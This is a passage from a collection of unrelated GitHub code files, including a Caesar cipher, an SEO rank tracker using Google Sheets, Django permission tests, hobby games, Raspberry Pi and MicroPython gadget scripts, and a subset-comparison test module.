self.wig_red(1,0,-1) \\\n *(U-V)*(U_ - V_ + r*dV_))\n\n # Bpm = np.tile(Bpm,(len_m,len_m_,1,1))\n\n Bpm = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bpm/r**2)[np.newaxis,:,:]\n #B0+- EXTRA\n Bpm_ = (self.wig_red(-1,0,1) + self.wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V * (U_-V_+r*(-dU_+dV_))\n Bpm_ += self.wig_red(0,0,0) * r*r*U*d2U_\n\n # Bpm_ = np.tile(Bpm_,(len_m,len_m_,1,1))\n\n Bpm_ = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bpm_/r**2)[np.newaxis,:,:]\n\n# tstamp('Bpm done')\n\n Bmm += Bmm_\n B0m += B0m_\n B00 += B00_\n Bpm += Bpm_\n\n Bmm = Bmm.astype('float64')\n B0m = B0m.astype('float64')\n B00 = B00.astype('float64')\n Bpm = Bpm.astype('float64')\n\n #constructing the other two components of the kernel\n Bpp = parity_fac[:,:,:,np.newaxis]*Bmm\n Bp0 = parity_fac[:,:,:,np.newaxis]*B0m\n \n return Bmm,B0m,B00,Bpm,Bp0,Bpp\n","repo_name":"srijaniiserprinceton/Global_lorentz_stress","sub_path":"get_kernels_separate.py","file_name":"get_kernels_separate.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3075244879","text":"choice = input('Шифр Цезаря\\nЧто вы хотите сделать с текстом? Ш - шифровать Р - расшифровать\\n')\nlang = input('Какой язык текста будет использован? Р - русский А - английский\\n')\ndelta = int(input('Задайте шаг сдвига (целое число)\\n'))\n\nchars_ru = 'абвгдежзийклмнопрстуфхцчшщъыьэюя'\nchars_eng = 'abcdefghijklmnopqrstuvwxyz'\n\n\ndef crypt_n_decrypt(string, delta, lang, choice):\n if lang.lower() == 'р':\n chars, mod = chars_ru, 32\n elif lang.lower() == 'а':\n chars, mod = chars_eng, 26\n\n if choice.lower() == 'р':\n delta = -delta\n\n for i in range(len(string)):\n if string[i] in '1234567890,./: !?':\n continue\n\n if string[i].isupper():\n chartmp = chars.upper()[(chars.find(string[i].lower()) + delta) % mod]\n else:\n chartmp = chars.lower()[(chars.find(string[i].lower()) + delta) % mod]\n\n string = string[:i] + chartmp + string[i + 1:]\n return string\n\n\nprint(crypt_n_decrypt(input('Введите текст\\n'), delta, lang, choice))\n","repo_name":"Bl00dWolf/Stepik_Course","sub_path":"Course for newbies/Caesar_Cipher.py","file_name":"Caesar_Cipher.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"865845748","text":"# Basic system packages:\nimport traceback\nimport os.path\nimport os\nimport shutil\nfrom urllib.parse import urlparse\nimport json\nimport sys\nfrom pprint import pprint\nimport datetime\nfrom pathlib import Path\nimport pathlib\nimport time\n\n# Google APIs\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.oauth2 import service_account\nfrom google.auth.transport.requests import Request\n\n# DataforSEO:\nfrom apiclient import errors\nfrom client import RestClient\n\n# NOTE: If you're looking for a place to start reading, jump to \"call_initiate_ranking\"\n# at the bottom of this file. 
\n\n# Tells Google oauth what we want permission to touch\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive']\n\nSERVICE_ACCOUNT_FILE = 'service_account.json'\n\n# Target spreadsheet ID\nFOLDER_ID = '1_PCARCXUY2s4ROn1xUn-FiDBULp5ylCW'\nSHEET_TITLE = str(datetime.datetime.now().year)\n\n# Convert column index into A1 notation\ndef colnum_string(n):\n string = \"\"\n while n > 0:\n n, remainder = divmod(n - 1, 26)\n string = chr(65 + remainder) + string\n return string\n\n# Pass credentials from service_account.json to the Google API.\ndef authenticate_google(API_title, API_version):\n creds = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n return build(API_title, API_version, credentials=creds)\n\n# Pass credentials from dataforseocreds.json to the DataForSEO API.\ndef authenticate_dataforseo():\n creds = None\n with open(\"dataforseocreds.json\", 'r') as f:\n creds = json.load(f)\n \n if creds:\n return RestClient(creds[\"login\"], creds[\"password\"])\n else: \n raise ValueError('No datafroseo credentials.')\n\n\n# Make sure a sheet exists for the current year and\n# copy keywords/URLs to new sheet if not (only runs at begining of each year)\ndef check_year_and_copy(sheet_id, service):\n\n # Get list of sheets in the spreadsheet\n spreadsheet_data = service.spreadsheets().get(spreadsheetId=sheet_id).execute()\n sheets = spreadsheet_data[\"sheets\"]\n\n # the \"next\" function in this condition finds the first element of the array that matches our constraint\n # in this case that the sheet title matches the current year. \n # If no sheet is found, it returns -1 and we create a sheet.\n if next((sheet for sheet in sheets if sheet['properties']['title'] == SHEET_TITLE), -1) == -1:\n\n old_sheet = str(datetime.datetime.now().year - 1)\n old_sheet_id = next((sheet for sheet in sheets if sheet['properties']['title'] == old_sheet), -1)['properties']['sheetId']\n\n # Count rows we must copy\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=sheet_id,\n range=(old_sheet + '!A:B')).execute()\n row_count = len(result.get('values', []))\n\n # Create a new sheet\n new_sheet_body = {\n \"requests\": [\n {\n \"addSheet\": {\n \"properties\": {\n \"title\": SHEET_TITLE,\n \"gridProperties\": {\n \"rowCount\": row_count,\n \"columnCount\": 2\n }\n }\n }\n }\n ]\n }\n request = service.spreadsheets().batchUpdate(spreadsheetId=sheet_id, body=new_sheet_body)\n new_sheet_response = request.execute()\n new_sheet_id = new_sheet_response[\"replies\"][0][\"addSheet\"][\"properties\"][\"sheetId\"]\n\n # Copy targets from old sheet to new sheet\n copy_keywords_body = {\n \"requests\": [\n {\n \"copyPaste\": {\n \"source\": {\n \"sheetId\": old_sheet_id,\n \"startRowIndex\": 0,\n \"endRowIndex\": row_count,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 2\n },\n \"destination\": {\n \"sheetId\": new_sheet_id,\n \"startRowIndex\": 0,\n \"endRowIndex\": row_count,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 2\n },\n \"pasteType\": \"PASTE_NORMAL\"\n }\n }\n ]\n }\n\n request = service.spreadsheets().batchUpdate(spreadsheetId=sheet_id, body=copy_keywords_body)\n request.execute()\n\n\n# Download keywords from spreadsheet.\ndef load_keyword_targets(sheet_id, service):\n\n # If it's a new year then move to a new sheet\n check_year_and_copy(sheet_id, service)\n \n # Call the Sheets API\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=sheet_id,\n range=(SHEET_TITLE 
+ '!A:B')).execute()\n values = result.get('values', [])\n\n if not values:\n raise ValueError('No target data found.')\n else:\n\n # Cut off first element because we don't want column titles\n return values[1:len(values)]\n\n# Submit keywords as jobs to DataForSEO\ndef initiate_tasks(keyword_targets, client):\n post_data = dict()\n for count, target in enumerate(keyword_targets):\n post_data[len(post_data)] = dict(\n language_code=\"en\",\n location_code=2840,\n keyword=target[0]\n )\n # Rate limiting, no more than 100 tasks per post by DataForSEO rules\n if (count % 95 == 0 and count > 0) or count == len(keyword_targets) - 1:\n response = client.post(\"/v3/serp/google/organic/task_post\", post_data)\n if response[\"status_code\"] != 20000:\n print(\"error. Code: %d Message: %s\" % (response[\"status_code\"], response[\"status_message\"]))\n post_data = dict()\n\n# The \"main\" function\ndef initiate_ranking(_):\n\n # Authenticate our APIs\n client = authenticate_dataforseo()\n drive_service = authenticate_google('drive', 'v3')\n sheet_service = authenticate_google('sheets', 'v4')\n\n # List of Keyword/URL pairs to track:\n targets = [] \n\n # Loop through spreadsheets in our folder until there are no more. \n # This while loop is necessary to handle (potentially infintie) pagination from Google Drive\n page_token = None\n while True:\n\n # Request one \"page\" of spreadsheets\n response = drive_service.files().list(q=\"mimeType='application/vnd.google-apps.spreadsheet' and '\" + FOLDER_ID + \"' in parents\",\n spaces='drive',\n fields='nextPageToken, files(id)',\n pageToken=page_token, supportsAllDrives=True, includeItemsFromAllDrives=True).execute()\n # Loop through each spreadsheet in this \"page\"\n for file in response.get('files', []):\n pprint(file.get('id'))\n\n # Add Keyword/URL pairs from this sheet to our list\n targets = targets + load_keyword_targets(file.get('id'), sheet_service)\n\n # Sleep to avoid hitting API rate limiting.\n time.sleep(20)\n\n # Request next \"page\" of spreadsheets \n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n \n # Submit keyword/URL pairs to DataforSEO\n initiate_tasks(targets, client)\n\n# This function wraps our script in a try/catch because otherwise GCP won't print errors if it crashes.\ndef call_initiate_ranking(_):\n try:\n initiate_ranking(None)\n except Exception as e:\n track = traceback.format_exc()\n print(track)","repo_name":"obventio56/keywordranktracker","sub_path":"initiate_tracker.py","file_name":"initiate_tracker.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11808246575","text":"import numpy as np\n\nN = int(input())\n\nA = []\nB = []\n\nfor _ in range(N):\n a, b = list(map(int, input().split()))\n A.append(a)\n B.append(b)\n\na_star, b_star = np.argmin(A), np.argmin(B)\n\n\nif a_star == b_star:\n a, b = A[a_star], B[b_star]\n A[a_star] = np.inf\n B[b_star] = np.inf\n\n a_star, b_star = np.argmin(A), np.argmin(B)\n print(min(max(a, B[b_star]), max(A[a_star], b), a + b))\n\nelse:\n print(max(A[a_star], B[b_star]))","repo_name":"Soule50431/AtCoder","sub_path":"ABC/ABC 194/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5370554537","text":"'''\nA nice string is one with all of the following properties:\n\n It contains at least three vowels (aeiou only), like aei, 
xazegov, or aeiouaeiouaeiou.\n It contains at least one letter that appears twice in a row, like xx, abcdde (dd), or aabbccdd (aa, bb, cc, or dd).\n It does not contain the strings ab, cd, pq, or xy, even if they are part of one of the other requirements.\n'''\n\ndef numvowels(s):\n\tvowels = ['a','e','i','o','u']\n\tcv = 0\n\tfor c in s:\n\t\tif c in vowels: cv += 1\n\treturn cv\n\ndef numdoubles(s):\n\tcv = 0\n\tlast_c = ' '\n\tfor c in s:\n\t\tif c == last_c: cv += 1\n\t\tlast_c = c\n\treturn cv\n\ndef bad(s):\n\tbad_pairs = [\"ab\", \"cd\", \"pq\", \"xy\"]\n\tfor n in range(len(s)-1):\n\t\tif s[n:n+2] in bad_pairs: return True\n\treturn False\n\t\ndef isnice(s):\n\tif (bad(s)): return False;\n\tif numvowels(s) > 2:\n\t\tif numdoubles(s) > 0:\n\t\t\treturn True\n\treturn False\n\ndef dbl_overlap(s):\n\tfor n in range(len(s) - 2):\n\t\tpair = s[n:n+2]\n\t\tfor j in range(n+2, len(s) - 2):\n\t\t\tif pair == s[j:j+2]: return True\n\treturn False\n\ndef rep_letter(s):\n\tfor i in range(len(s) - 3):\n\t\tif s[i] == s[i+2]: return True\n\treturn False\n\ndef isniceP2(s):\n\treturn dbl_overlap(s) and rep_letter(s)\n\t\n\t\nnice = 0\nfor line in open(\"data.txt\", \"r\"):\n\tif isnice(line) : \n\t\tnice += 1\n\nprint(\"Part 1: there are \", nice, \" nice strings\")\n\nnice = 0\nfor line in open(\"data.txt\", \"r\"):\n\tif isniceP2(line) : \n\t\tnice += 1\n\nprint(\"Part 2: there are \", nice, \" nice strings\")\n","repo_name":"buscagliad/adventofcode","sub_path":"2015/day05/nice.py","file_name":"nice.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24053061927","text":"from django.urls import reverse\n\nfrom rest_framework.test import APITestCase\n\nfrom mocks.tests.factories import SubscriptionFactory\nfrom roles.models import Role\nfrom users.tests.factories import UserFactory\n\n\nclass TestMockAPI(APITestCase):\n fixtures = ('roles.yaml',)\n\n @classmethod\n def setUpTestData(cls):\n cls.user = UserFactory()\n cls.url_premium = reverse('api:mocks:mocks-phone')\n cls.url_extra = reverse('api:mocks:mocks-color')\n cls.url_luxe = reverse('api:mocks:mocks-passport')\n\n def test_phone_data_can_be_accessed_only_by_premium(self):\n role = Role.objects.get(name='Premium')\n SubscriptionFactory(user=self.user, role=role)\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_premium)\n self.assertEqual(response.status_code, 200)\n\n def test_color_data_can_be_accessed_only_by_extra(self):\n role = Role.objects.get(name='Extra')\n SubscriptionFactory(user=self.user, role=role)\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_extra)\n self.assertEqual(response.status_code, 200)\n\n def test_passport_data_can_be_accessed_only_by_luxe(self):\n role = Role.objects.get(name='Luxe')\n SubscriptionFactory(user=self.user, role=role)\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_luxe)\n self.assertEqual(response.status_code, 200)\n\n def test_can_not_access_data_with_no_subscription(self):\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_premium)\n self.assertEqual(response.status_code, 403)\n\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_extra)\n self.assertEqual(response.status_code, 403)\n\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_luxe)\n 
self.assertEqual(response.status_code, 403)\n","repo_name":"lymagics/game-of-roles","sub_path":"src/mocks/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37867435875","text":"import random\n\n# Card constants\nSUIT_TUPLE = ('Spades', 'Hearts', 'Clubs', 'Diamonds')\nRANK_TUPLE = ('Ace', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King')\n\nNCARDS = 8\n\n# Pass in a deck and this function returns a random card from the deck\ndef getCard(deckListIn):\n thisCard = deckListIn.pop()\n return thisCard\n\n# Pass in a deck and this function returns a shuffled copy of the deck\ndef shuffle(deckListIn):\n deckListOut = deckListIn.copy() # Deep Copy: Different from deckListIn[:]\n random.shuffle(deckListOut)\n return deckListOut\n\n# Main code\nprint(f'Welcome to Higher or Lower \\n'\n f'You have to choose whether the next card to be shown will be higher or lower than the current card \\n'\n f'Getting it right adds 20 points; get it wrong and you \\n'\n f'lose 15 points. \\n'\n f'You have 50 points to start. \\n'\n f'\\n')\n\n# Create a list of Dictionary\nstartingDeckList = []\n\nfor suit in SUIT_TUPLE:\n for thisValue, rank in enumerate(RANK_TUPLE):\n cardDict = {'rank': rank, 'value': thisValue+1, 'suit': suit}\n startingDeckList.append(cardDict)\n\n\nscore = 50\nwhile True:\n print()\n gameDeckList = shuffle(startingDeckList)\n currentCardDict = getCard(gameDeckList)\n currentCardRank = currentCardDict['rank']\n currentCardValue = currentCardDict['value']\n currentCardSuit = currentCardDict['suit']\n print('Starting card is:', currentCardRank + ' of ' + currentCardSuit)\n print()\n\n # play 1 game of 8 cards\n\n for cardNumber in range(0, NCARDS): # play one game of this many cards\n answer = input(f'Will the next card be higher or lower than the {currentCardRank} of '\n f'{currentCardSuit}? 
(enter h or l):')\n answer = answer.casefold()\n\n nextCardDict = getCard(gameDeckList)\n nextCardRank = nextCardDict['rank']\n nextCardSuit = nextCardDict['suit']\n nextCardValue = nextCardDict['value']\n print(f'Next card is: {nextCardRank} of {nextCardSuit}')\n\n if answer == 'h':\n if nextCardValue > currentCardValue:\n print('You got it right, it was higher')\n score = score + 20\n else:\n print('Sorry, it was not higher')\n score = score - 15\n elif answer == 'l':\n if nextCardValue < currentCardValue:\n score = score + 20\n print('You got it right, it was lower')\n else:\n score = score - 15\n print('Sorry, it was not lower')\n\n print('Your score is:', score)\n print()\n currentCardRank = nextCardRank\n currentCardValue = nextCardValue # don't need current suit\n\n goAgain = input('To play again, press ENTER, or \"q\" to quit: ')\n if goAgain == 'q':\n break\n\nexit()\n\n","repo_name":"suvambh/ObjectOrientedPython","sub_path":"Part_1/HigherOrLowerProcedural.py","file_name":"HigherOrLowerProcedural.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73907215274","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\nimport sys\n\nprint(sys.argv)\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as reader:\n long_description = '\\n'.join(reader.readlines())\n\nVERSION = '0.0.0'\nDESCRIPTION = 'test package for testing github workflow'\nLONG_DESCRIPTION = long_description\n\n# Setting up\n# noinspection SpellCheckingInspection\nsetup(\n version=os.environ.get('BUILD_VERSION') or VERSION,\n name=\"malogan-pypi-test\",\n author=\"malogan (Mason Logan)\",\n author_email=\"\",\n url='https://github.com/masonlogan1/pypi-test',\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(exclude=['tests']),\n install_requires=[],\n data_files=[],\n include_package_data=True,\n keywords=[],\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)\n","repo_name":"masonlogan1/pypi-test","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8694832328","text":"import time\r\nfrom machine import I2C, Pin\r\nfrom vl6180 import Sensor\r\nimport ssd1306\r\n\r\ni2c_lidar = I2C(sda=Pin(4), scl=Pin(5))\r\ni2c_display = I2C(-1, Pin(5), Pin(4))\r\nlidar = Sensor(i2c_lidar)\r\ndisplay = ssd1306.SSD1306_I2C(128, 64, i2c_display)\r\ndisplay.fill(0)\r\nprev = lidar.range()\r\nwhile True:\r\n display.fill(0)\r\n display.text(\"Range-Milli Mts : \", 0, 0)\r\n display.text(str(lidar.range()), 0, 10)\r\n display.text(\"Gesture : \", 0, 20)\r\n cur = lidar.range()\r\n if prev > cur:\r\n if prev is 255:\r\n display.text(\"Glitch\", 21, 40)\r\n else:\r\n display.text(\"Approaching\", 21, 40)\r\n elif prev < cur:\r\n display.text(\"Moving Away\", 21, 40)\r\n elif cur is 255:\r\n display.text(\"No Gesture\", 21, 40)\r\n\r\n prev = cur\r\n 
display.show()\r\n","repo_name":"miubisystems/IOT-Using-NodeMCU-MicroPython","sub_path":"Lab8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14391015110","text":"import pygame\nimport board\nimport busio\nimport time\nimport paho.mqtt.client as mqtt\nimport uuid\nimport signal\n\nfrom gtts import gTTS\nfrom word2number import w2n\nimport speech_recognition as sr\nimport os\nimport random\n\nimport digitalio\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\n\n# ======================= record voices =====================================\n\nPauseText = 'Music Paused'\nPlayText = 'Music Continued'\nSkipText = \"Music Skipped\"\n\nlanguage = 'en'\nmPause = gTTS(text=PauseText, lang=language, slow=False)\nmPlay = gTTS(text=PlayText, lang=language, slow=False) \nmSkip = gTTS(text=SkipText, lang=language, slow=False) \n\nmPause.save(\"mpause.mp3\")\nmPlay.save(\"mplay.mp3\")\nmSkip.save(\"mskip.mp3\")\n\n# ======================= Controls ==========================================\n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\n\nimage = Image.new(\"RGB\", (width, height))\ndraw = ImageDraw.Draw(image)\n\n\n#================================ music player ===============================================\n\npygame.init()\npygame.mixer.init()\n\ndef play(x):\n pygame.mixer.music.load(x)\n pygame.mixer.music.play()\ndef stop():\n pygame.mixer.music.stop()\ndef pause():\n pygame.mixer.music.pause()\ndef unpause():\n pygame.mixer.music.unpause()\n \nsong = \"test.mp3\"\nsong2 = \"test2.mp3\"\ncurr = \"test.mp3\"\nplay(curr)\n\nisPause = False\n\n#Set up speech recognition\nr = sr.Recognizer()\n \nwhile True:\n string = song\n \n font = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\n \n draw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\n \n if not buttonA.value:\n pause()\n with sr.Microphone() as source:\n audio = r.listen(source)\n response = r.recognize_sphinx(audio)\n #responseInt = w2n.word_to_num(response)\n print(\"DEBUG:\" + response)\n if response == \"stop\":\n os.system(\"mplayer mpause.mp3\")\n isPause = True\n continue\n elif response == \"play\":\n os.system(\"mplayer mplay.mp3\")\n isPause = False\n unpause()\n continue\n elif response == \"banana\":\n os.system(\"mplayer mskip.mp3\")\n isPause = False\n if curr == \"test.mp3\":\n curr = \"test2.mp3\"\n play(\"test2.mp3\")\n else:\n curr = \"test.mp3\"\n play(\"test.mp3\") \n if isPause == False:\n unpause()\n \n '''\n if not buttonA.value:\n pause()\n if not buttonB.value:\n unpause() \n '''\n draw.text((0, 0), string, font=font, 
fill=(240,255,255))\n \n disp.image(image, 90)\n time.sleep(.01)\n","repo_name":"hguoTTT/Interactive-Lab-Hub","sub_path":"finalproject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"6250203368","text":"import torch\nimport torch.nn.functional as func\nfrom torch import nn\n\n\n# 加载和保存张量\nx = torch.arange(4) # 长为 4 的向量\ntorch.save(x, 'x-file') # 将向量 x 存储在这个叫做 x-file 的文件里\nx2 = torch.load(\"x-file\") # 访问并读取 x-file 的文件,加载到 x2 中\n\n# 列表和字典同样可以存储和读取\ny = torch.arange(4)\ntorch.save([x, y], 'x-file')\nx2, y2 = torch.load(\"x-file\")\n\nmydict = {'x': x, 'y': y}\ntorch.save(mydict, 'x-file')\nmydict2 = torch.load(\"x-file\")\n\n\n# 加载和保存模型参数\n# 其实只需要存储权重就好了。比如给出一个最简单的 MLP\nclass MLP(nn.Module):\n def __init__(self):\n super().__init__() # 继承父类\n self.hidden = nn.Linear(20, 256)\n self.out = nn.Linear(256, 20)\n\n # nn.Module 类中,__call__ 方法会调用 forward 方法。这里重写 nn.Module 模块\n def forward(self, x): # x 是输入\n # 先根据输入,求出隐藏层的输出;然后通过 ReLU 激活函数,最后通过 self.out 输出,这就完成了前向计算\n return self.out(func.relu(self.hidden(x)))\n\n\nnet = MLP()\nX = torch.randn(size=(2, 20))\nY = net(X)\n\n\n# 现在就可以将模型的参数存储在一个叫做 mlp.params 的文件\ntorch.save(net.state_dict(), 'mlp.params')\n\n# 如果要读取,则先需要实例化 MLP\nclone = MLP()\nclone.load_state_dict(torch.load(\"mlp.params\")) # 用文件中的参数覆盖掉初始化参数\n","repo_name":"Sen-Yao/MyDeepLearning","sub_path":"1. Linear regression model/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72015214312","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 23 19:12:01 2020\n\n@author: pi\n\"\"\"\n\nimport paho.mqtt.client as mqtt\n\n# This is the Publisher\n\nclient = mqtt.Client()\nclient.connect(\"192.168.43.2\",1883,60)\nclient.publish(\"sensor/data\", \"Hello world!\");\nclient.disconnect();","repo_name":"falconeroberto/image_rasp","sub_path":"broker_center_component/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39972836919","text":"from functools import wraps\nfrom tornado import web, gen\nfrom tornado.web import HTTPError\nfrom ecogame.handler.common_handler import AuthCommonHandler\n\n\ndef require_cords(method):\n \"\"\"\n Allow AJAX requests only\n\n Usage:\n @require_ajax\n def my_view(request):\n pass\n \"\"\"\n\n @wraps(method)\n def wrapper(handler, *args, **kwargs):\n try:\n lat = float(handler.get_argument('lat'))\n lng = float(handler.get_argument('lng'))\n except ValueError:\n raise HTTPError(400)\n kwargs['lat'] = round(lat, 6)\n kwargs['lng'] = round(lng, 6)\n return method(handler, *args, **kwargs)\n return wrapper\n\n\nclass GameDashboardHandler(AuthCommonHandler):\n @web.authenticated\n def get(self):\n self.render('game.html')\n\n\nclass ZombiesHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n def get(self):\n \"\"\"Возвращает зомби доступных пользователю\"\"\"\n zombies = yield self.user.zombies()\n self.send_json(zombies)\n\n\nclass PollutionHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n def get(self):\n \"\"\"Возвращает загрязнения\"\"\"\n pollutions = yield self.loader.pollution_manager.find()\n self.send_json(pollutions)\n\n\nclass RobotHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n def 
get(self):\n \"\"\"Возвращает загрязнения\"\"\"\n robots = yield self.loader.robot_manager.find_visible()\n self.send_json(robots)\n\n\nclass RobotMoveHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n @require_cords\n def post(self, robot_id, lat, lng, *args, **kwargs):\n \"\"\"Перемещает робота на указанные координаты\"\"\"\n robot = yield self.user.get_robot(robot_id)\n robot.move(lat, lng)\n self.send_json({'result': True})\n\n\nclass BoomHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n @require_cords\n def post(self, lat, lng, *args, **kwargs):\n \"\"\"Удаляет загрязнений в указанных координатах\"\"\"\n if self.user.balance <= 0:\n self.send_error_json('Недостаточно кристалов. Приглашайте друзей и выполняйте задания!', {'balance': 0})\n else:\n removed_ids = yield self.user.boom(lat, lng)\n self.send_json({'balance': self.user.balance, 'items': removed_ids.as_ids_view()})\n","repo_name":"octoberry/eco-py","sub_path":"ecogame/handler/game_handler.py","file_name":"game_handler.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20891704081","text":"import unittest\n\nfrom typing import Dict, List, Any\n\nfrom pybits.subset import (\n dict_assert_is_subset,\n dict_is_subset,\n list_is_subset,\n)\nfrom pybits.exceptions import (\n ComparisonBaseError,\n ComparisonErrorInfo,\n)\n\n\nclass TestSubsetModule(unittest.TestCase):\n def test_dict_assert_is_subset_exception(self):\n with self.assertRaises(ComparisonErrorInfo):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"bar\", \"children\": []}],\n }\n\n dict_assert_is_subset(subset, superset)\n\n def test_dict_assert_is_subset_exception_depth(self):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"bar\", \"children\": []}],\n }\n\n result = -1\n\n result_excpected = 2\n\n try:\n dict_assert_is_subset(subset, superset)\n except ComparisonBaseError as e:\n result = e.depth\n\n self.assertEqual(result, result_excpected)\n\n def test_dict_is_subset_true(self):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"foo\", \"children\": []}],\n }\n\n result = dict_is_subset(subset, superset)\n\n self.assertTrue(result)\n\n def test_dict_is_subset_false(self):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"bar\", \"children\": []}],\n }\n\n result = dict_is_subset(subset, superset)\n\n self.assertFalse(result)\n\n def test_list_is_subset_strings_true(self):\n superset: List[str] = [\"foo\", \"bar\", \"foobar\"]\n\n subset: List[str] = [\"foobar\"]\n\n result = list_is_subset(subset, superset)\n\n self.assertTrue(result)\n\n def test_list_is_subset_strings_false(self):\n superset: List[str] = [\"foo\", \"bar\", \"foobar\"]\n\n 
